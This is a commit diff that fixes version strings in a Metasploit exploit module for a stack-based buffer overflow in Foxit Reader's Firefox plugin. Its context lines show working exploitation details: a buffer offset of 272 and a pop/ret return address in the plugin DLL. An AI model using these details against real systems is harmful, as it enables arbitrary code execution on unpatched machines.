fix version info
parent
69267b82b0
commit
96b1cb3cfb
|
@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
the npFoxitReaderPlugin.dll module. When loading PDF files from remote hosts,
|
||||
overly long query strings within URLs can cause a stack-based buffer overflow,
|
||||
which can be exploited to execute arbitrary code. This exploit has been tested
|
||||
on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.1128
|
||||
on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281
|
||||
(npFoxitReaderPlugin.dll version 2.2.1.530).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
# npFoxitReaderPlugin.dll version 2.2.1.530
|
||||
[ 'Automatic', {} ],
|
||||
[ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44',
|
||||
[ 'Windows 7 SP1 / Firefox 18 / Foxit Reader 5.44.11281',
|
||||
{
|
||||
'Offset' => 272,
|
||||
'Ret' => 0x1000c57d, # pop # ret # from npFoxitReaderPlugin
|
||||
|
|
Loading…
Reference in New Issue